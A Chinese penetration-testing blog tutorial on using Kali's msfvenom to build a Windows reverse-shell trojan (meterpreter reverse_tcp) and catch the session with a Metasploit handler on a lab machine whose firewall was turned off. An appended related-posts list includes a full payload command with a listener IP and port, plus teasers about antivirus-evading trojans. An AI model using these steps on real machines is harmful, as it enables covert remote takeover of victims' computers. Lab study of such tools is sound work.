msf之msfvenom的使用—使用Kali渗透工具生成远控木马
一.先解释一下
msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线。
(注意:msfvenom是在shell里使用的哈,不是msfconsole终端!)
公式如下(别人的图,借鉴借鉴)
二.那就开始使用吧
1.使用模块
等待生成demo1000.exe(生成shell)
( lhost为Kali的IP, Iport在范围内随意设置,记住你设置的端口号后面要用,可以参考下面的这个图中的信息)
2.生成后门成功
在文件夹中查找到
(这个demo10000.exe就是shell !!)
(在实操中,一般是通过web等漏洞来 进行上传到目标机的)
此处为了能快速复刻实验,直接复制到目标主机上!(注意!防火墙会拦截!我这里是已经手动关闭了防火墙的!如果你不想关闭防火墙到时候可以手动信任一下)
3.木马复制到目标机后回到Kali
把Kali端口打开(同生成木马的lport 1000 一样哦)
①首先进入msf模块
②使用下列模块开启端口
并查看模块必选项:
这里的handler的模块一定要同之前生成后门的必选项是一致的
设置完成后直接跑起来!!!
注意:当目标机不触发demo1000时这个程序是不会跑出结果的!!
当目标主机运行这个程序时才会出现哦!
成功之后就会出现meterpreter啦,是不是和上次的不谋而合了结局。
learning.......
msf之msfvenom的使用—使用Kali渗透工具生成远控木马相关推荐
- msfvenom生成远控木马
1.生成病毒 在终端输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost =192.168.116.132 lport =12345 -f e ...
- Kali Linux Armitage生成被控端和主控端
目录 说明 使用 Armitage生成被控端和主控端 说明 按照<Kali Linux2 网络渗透测试实践指南 第二版 >第八章操作 仅供学习讨论使用,请勿进行非法操作 使用 Armita ...
- vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器
一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强 ...
- 渗透测试快速稳定远控软件,高级渗透测试第八季-demo即是远控
本季是<高级持续渗透-第七季demo的成长>的延续. 点击文末左下方"阅读原文"可阅读第七季正文. https://www.secpulse.com/archives/ ...
- 网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
实战-使用msf扫描靶机上mysql服务的空密码 我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180 登录Metasploitable2-Linu ...
- Web渗透之MSF框架——msfvenom与免杀木马制作
文章目录 生成常见的反向连接木马 反向连接的优势: Windows: Linux: MAC: PHP: Asp: Aspx: msfvenom参数介绍 生成免杀木马 360免杀木马 腾讯管家免杀木马 ...
- 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控
内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...
- 渗透工具-白帽安全工程师Kali linux系统
渗透工具-白帽安全工程师Kali linux ubuntu 20.04 安装metasploit msfvenom常用生成 Payload 命令 2022 安装 Armitage 傻瓜渗透msf 介绍 ...
- Kali渗透测试:远程控制程序基础
Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) ...
最新文章
- 15.使用一样的BFS方法(代码几乎一模一样)解决多道LeetCode题目--542题(01矩阵)1765题(地图中的最高点)994腐烂的橘子
- C# winform combobox默认选中项方法
- rfid商品管理软件_哪个RFID固定资产管理系统比较好用?
- c++面试题之标准模板库
- 【scala】集和映射
- [XSY] 分割(dfs树)
- 实例10:python
- 即学即会 Serverless | 初识 Serverless 架构
- numpy的使用(一)(reshape()有待研究)
- Jmeter 线程数、Ramp-Up、循环次数 详解
- crypto-CommonModulusAttack(GXYCTF2019)
- VBS上传文件(转载)
- GC8837 DFN8 12V直流电机驱动芯片 完美替代TI DRV8837
- VS Code 空闲时的 CPU 使用率是 13%
- Failed to get convolution algorithm. This is probably because cuDNN failed to initialize,
- gdb打印errno显示cant find thread-local storage xxxx
- 23Java面试专题 八股文面试全套真题(含大厂高频面试真题)多线程
- 关于职业规划,尤其值得我们程序员学习、思考
- 在文件夹中快速打开命令行
- 压缩感知中的数学知识:投影矩阵(projection matrix)